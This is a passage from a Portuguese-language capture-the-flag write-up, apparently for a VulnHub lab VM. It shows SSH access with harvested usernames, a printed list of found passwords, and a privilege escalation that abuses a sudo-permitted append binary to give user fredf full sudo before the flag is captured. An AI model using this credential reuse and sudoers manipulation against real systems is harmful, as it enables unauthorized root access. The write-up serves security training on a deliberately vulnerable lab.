MAC Address: 00:0C:29:0C:D9:D6 (VMware)</span></span></span></code></pre><div id="https://www.notion.so/d0caa7938c7149e38a112db38d633389" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">Podemos observar que agora a porta 22 está aberta! Hora de tentar entrar com os usuários que obtivemos. </span></span></p></div><div id="https://www.notion.so/f6b0de351a88485ca5cd78895658ee56" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">Foram várias tentativas, claro, mas vamos na que funcionou. Vamos acessar com o Donald Trump! </span></span></p></div><div id="https://www.notion.so/6cbe0bedbe4e44288c53a618e80eb143" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"></span></p></div><div id="https://www.notion.so/25f99c36621f4a80be5f45171a962309" class="Image Image--Normal"><figure><a href="https://www.notion.so/signed/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F2d9fc7b8-2cc5-4b68-bdbd-06493c3e6ed4%2FUntitled.png?width=304&table=block&id=25f99c36-621f-4a80-be5f-45171a962309"><img src="https://www.notion.so/signed/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F2d9fc7b8-2cc5-4b68-bdbd-06493c3e6ed4%2FUntitled.png?width=304&table=block&id=25f99c36-621f-4a80-be5f-45171a962309" style="width:304px"/></a><figcaption><span class="SemanticStringArray"></span></figcaption></figure></div><div id="https://www.notion.so/d1ea46c34d6d40a99fb300df7af2c022" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"></span></p></div><div id="https://www.notion.so/c5cc932fbef6453ca2344ee1193cc718" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"></span></p></div><div id="https://www.notion.so/32c99c66bc8648b4b3f458bc18d04142" class="Image Image--PageWidth"><figure><a href="https://www.notion.so/signed/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2Fb1adba97-237b-4e21-8c27-97cb1b7d9d17%2FUntitled.png?width=725&table=block&id=32c99c66-bc86-48b4-b3f4-58bc18d04142"><img src="https://www.notion.so/signed/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2Fb1adba97-237b-4e21-8c27-97cb1b7d9d17%2FUntitled.png?width=725&table=block&id=32c99c66-bc86-48b4-b3f4-58bc18d04142" style="width:100%"/></a><figcaption><span class="SemanticStringArray"></span></figcaption></figure></div><div id="https://www.notion.so/be9b6a0f93d949c18e676aff3e183888" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">Obtemos mais algumas senhas! </span></span></p></div><pre id="https://www.notion.so/8642602e14354013ac6d0a0a1c10c0a4" class="Code"><code><span class="SemanticStringArray"><span class="SemanticString"><span>.secrets-for-putin/passwords-found-on-post-it-notes.txt
</span></span><span class="SemanticString"><mark class="SemanticString__Fragment SemanticString__Fragment--HighlightedColor SemanticString__Fragment--ColorRed"><span>BamBam01
Passw0rd
smellycats
P0Lic#10-4
B4-Tru3-001
4uGU5T-NiGHts</span></mark></span></span></code></pre><div id="https://www.notion.so/7f394a4dd9374222b85b3acfac80191e" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"></span></p></div><div id="https://www.notion.so/0f94f8da6cc040e38974e497e48bb0f0" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">Vamos tentar ver se o janitor tem permissão para sudo</span></span></p></div><div id="https://www.notion.so/5028c0ce50a549f4966c2787c226ac3a" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"></span></p></div><div id="https://www.notion.so/6521d2378a3d4d5c9154f6357ae99923" class="Image Image--Normal"><figure><a href="https://www.notion.so/signed/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F798af9f0-7398-458d-95f2-47a8d96be8d4%2FUntitled.png?width=662&table=block&id=6521d237-8a3d-4d5c-9154-f6357ae99923"><img src="https://www.notion.so/signed/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F798af9f0-7398-458d-95f2-47a8d96be8d4%2FUntitled.png?width=662&table=block&id=6521d237-8a3d-4d5c-9154-f6357ae99923" style="width:662px"/></a><figcaption><span class="SemanticStringArray"></span></figcaption></figure></div><div id="https://www.notion.so/3d1e27f9647b405b801d8724e71c13a2" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"></span></p></div><div id="https://www.notion.so/447bb95fdfaa44ff8905b92e7a163a07" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">Existe um usuário que na descrição dele fala que é o System Administrator. Vamos tentar usar alguma destas senhas obtidas para ver se conseguimos autenticar com o usuário dele. </span></span></p></div><div id="https://www.notion.so/b6c1105a609f4a1caa7d26441646b7ad" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"></span></p></div><div id="https://www.notion.so/dc38cbc13479473ebd04d48bec520c15" class="Image Image--Normal"><figure><a href="https://www.notion.so/signed/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F5ad22a0b-2f2b-46bb-b0af-3396afaece9c%2FUntitled.png?width=294&table=block&id=dc38cbc1-3479-473e-bd04-d48bec520c15"><img src="https://www.notion.so/signed/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F5ad22a0b-2f2b-46bb-b0af-3396afaece9c%2FUntitled.png?width=294&table=block&id=dc38cbc1-3479-473e-bd04-d48bec520c15" style="width:294px"/></a><figcaption><span class="SemanticStringArray"></span></figcaption></figure></div><div id="https://www.notion.so/6c593458a7ff4db5b4342c72d2a6ea16" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"></span></p></div><div id="https://www.notion.so/fd124c1a495a4623957080830f2c1a9e" class="Image Image--Normal"><figure><a href="https://www.notion.so/signed/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F585b1027-5f59-44dc-9089-97471a361871%2FUntitled.png?width=517&table=block&id=fd124c1a-495a-4623-9570-80830f2c1a9e"><img src="https://www.notion.so/signed/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F585b1027-5f59-44dc-9089-97471a361871%2FUntitled.png?width=517&table=block&id=fd124c1a-495a-4623-9570-80830f2c1a9e" style="width:517px"/></a><figcaption><span class="SemanticStringArray"></span></figcaption></figure></div><div id="https://www.notion.so/5b5f63b917b64198b74f992341b407b2" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"></span></p></div><div id="https://www.notion.so/41346a7d9d2e456485b2a02b07247c49" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">Sendo System Admin, vamos ver se tem permissão de sudo.</span></span></p></div><div id="https://www.notion.so/808677b6c2f3400690947a9b86460678" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"></span></p></div><div id="https://www.notion.so/c15745d4f8eb40498a9bf67b12679c21" class="Image Image--PageWidth"><figure><a href="https://www.notion.so/signed/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2Fdc418699-87b6-437d-8577-84a73e00a179%2FUntitled.png?width=984&table=block&id=c15745d4-f8eb-4049-8a9b-f67b12679c21"><img src="https://www.notion.so/signed/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2Fdc418699-87b6-437d-8577-84a73e00a179%2FUntitled.png?width=984&table=block&id=c15745d4-f8eb-4049-8a9b-f67b12679c21" style="width:100%"/></a><figcaption><span class="SemanticStringArray"></span></figcaption></figure></div><div id="https://www.notion.so/346dc8d459784f0cb46fe5f6847705ae" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"></span></p></div><div id="https://www.notion.so/35f64472d98846949b2e15176990d23a" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">Opa, possui permissão de sudo para executar o binário em </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">/opt/devstuff/dist/test/test</code></span></span></p></div><div id="https://www.notion.so/f17321a0ae2e4d439c9ac783cd94d8bb" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">Vamos testar e ver do que se trata</span></span></p></div><div id="https://www.notion.so/61b7291184674319a22be636808c9cbd" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"></span></p></div><div id="https://www.notion.so/638a0a5a2b774218b25318c94600a5a9" class="Image Image--PageWidth"><figure><a href="https://www.notion.so/signed/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2Fa8ff0470-171a-4bb9-8848-6739304b206c%2FUntitled.png?width=906&table=block&id=638a0a5a-2b77-4218-b253-18c94600a5a9"><img src="https://www.notion.so/signed/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2Fa8ff0470-171a-4bb9-8848-6739304b206c%2FUntitled.png?width=906&table=block&id=638a0a5a-2b77-4218-b253-18c94600a5a9" style="width:100%"/></a><figcaption><span class="SemanticStringArray"></span></figcaption></figure></div><div id="https://www.notion.so/d3005d767faf4899b6b33978e1cb5407" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">Trata-se de um binário que aparentemente é um python compilado que espera dois parâmetros: read e append. Parece que trata-se de pegar um texto ou arquivo e fazer um append em outro.</span></span></p></div><div id="https://www.notion.so/ce7efa20c78941ea96100fdc1f342a5d" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"></span></p></div><div id="https://www.notion.so/5a2b55929b2845c59920100e480cc762" class="Image Image--Normal"><figure><a href="https://www.notion.so/signed/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F7cfddda6-eeb5-42ce-8081-5fbee2399710%2FUntitled.png?width=623&table=block&id=5a2b5592-9b28-45c5-9920-100e480cc762"><img src="https://www.notion.so/signed/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F7cfddda6-eeb5-42ce-8081-5fbee2399710%2FUntitled.png?width=623&table=block&id=5a2b5592-9b28-45c5-9920-100e480cc762" style="width:623px"/></a><figcaption><span class="SemanticStringArray"></span></figcaption></figure></div><div id="https://www.notion.so/99c6e41ee37a429d96bd08fb24610a08" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"></span></p></div><div id="https://www.notion.so/2b3f6d9ef10d4bdfafa5a3f396de2f03" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">Ele espera um arquivo onde colocamos o aaaa. </span></span></p></div><div id="https://www.notion.so/c058d24d68934ee3bea0a7b9e305c2cd" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"></span></p></div><div id="https://www.notion.so/b52856d1eb234e2dbd2232cb6482d0c9" class="Image Image--Normal"><figure><a href="https://www.notion.so/signed/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2Fecaf852f-a18f-4667-bb6a-4e5a08a7abf6%2FUntitled.png?width=545&table=block&id=b52856d1-eb23-4e2d-bd22-32cb6482d0c9"><img src="https://www.notion.so/signed/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2Fecaf852f-a18f-4667-bb6a-4e5a08a7abf6%2FUntitled.png?width=545&table=block&id=b52856d1-eb23-4e2d-bd22-32cb6482d0c9" style="width:545px"/></a><figcaption><span class="SemanticStringArray"></span></figcaption></figure></div><div id="https://www.notion.so/ac9726364c0a4a729f017ebc3f4df397" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"></span></p></div><div id="https://www.notion.so/85e11642047b4bd48263cf6ef3692152" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">Pronto! Temos um binário que pega o conteúdo de um arquivo e adiciona em outro. Logo, que tal adicionarmos permissão total de sudo para o fredf ?! </span></span></p></div><div id="https://www.notion.so/13ee1993276e4187b00fc04d99465084" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"></span></p></div><div id="https://www.notion.so/36038e5d09e2428f87cba49be904717c" class="Image Image--PageWidth"><figure><a href="https://www.notion.so/signed/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F532ddc26-d184-4a4c-ad47-7bddf294c4ce%2FUntitled.png?width=770&table=block&id=36038e5d-09e2-428f-87cb-a49be904717c"><img src="https://www.notion.so/signed/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F532ddc26-d184-4a4c-ad47-7bddf294c4ce%2FUntitled.png?width=770&table=block&id=36038e5d-09e2-428f-87cb-a49be904717c" style="width:100%"/></a><figcaption><span class="SemanticStringArray"></span></figcaption></figure></div><div id="https://www.notion.so/2a2a9fad84e849ba8bb0a0657ae2b542" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"></span></p></div><div id="https://www.notion.so/6187e9030dba46a6a37916d99be9d280" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">E agora a Flag. </span></span></p></div><div id="https://www.notion.so/85b2fb03ebb74e1296eb7837e7741a7d" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"></span></p></div><div id="https://www.notion.so/2c1a616fe21c44389ba429c42fc1cda7" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"></span></p></div><div id="https://www.notion.so/72557bf7482341f7be206b525904e3f4" class="Image Image--PageWidth"><figure><a href="https://www.notion.so/signed/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F45398cf2-f778-443c-8e5a-2946f055b4c9%2FUntitled.png?width=758&table=block&id=72557bf7-4823-41f7-be20-6b525904e3f4"><img src="https://www.notion.so/signed/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F45398cf2-f778-443c-8e5a-2946f055b4c9%2FUntitled.png?width=758&table=block&id=72557bf7-4823-41f7-be20-6b525904e3f4" style="width:100%"/></a><figcaption><span class="SemanticStringArray"></span></figcaption></figure></div></article>
<footer class="Footer">
<div>© www.offensivethink.com 2024</div>
<div>·</div>
<div>Powered by <a href="https://github.com/dragonman225/notablog" target="_blank"
rel="noopener noreferrer">Notablog</a>.
</div>
</footer>
</body>
</html>